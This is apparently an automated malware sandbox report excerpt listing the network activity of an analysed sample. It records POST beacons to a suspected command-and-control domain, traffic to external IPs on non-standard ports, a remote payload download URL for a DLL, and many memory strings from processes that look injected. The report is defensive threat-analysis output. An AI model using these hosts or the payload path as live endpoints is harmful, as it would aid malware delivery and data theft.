Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjawtynvst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fyeyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: potunulit.org
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49738 -> 89.208.103.88:37538
Source: fontview.exe, 0000000D.00000002.573042079.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://109.206.243.168/upload/libcurl.dll
Source: fontview.exe, 0000000D.00000002.573042079.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://109.206.243.168/upload/libcurl.dllw
Source: explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://aygtqn.org/
Source: explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://aygtqn.org/tem/W
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://egqgnqk.org/
Source: explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://egqgnqk.org/s
Source: explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://fedface.com/
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2s/
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2s/)
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2s/7
Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2sMicrosoft
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s/
Source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000003.00000003.450504843.0000000008465000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450669727.000000000CE96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450504843.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453176660.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.451453934.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.450122194.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449095692.000000000D15B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.454953179.000000000D16F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/22n-g
Source: explorer.exe, 00000003.00000003.450504843.0000000008465000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/:
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/:=f
Source: explorer.exe, 00000003.00000003.450669727.000000000CE96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449577540.0000000008394000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/G
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/J2v-m
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/hg
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org/s
Source: explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org:80/
Source: explorer.exe, 00000003.00000003.450669727.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://potunulit.org:80/N
Source: explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ryjphgb.com/
Source: explorer.exe, 00000003.00000003.450627478.00000000085C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ryjphgb.com/pace
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
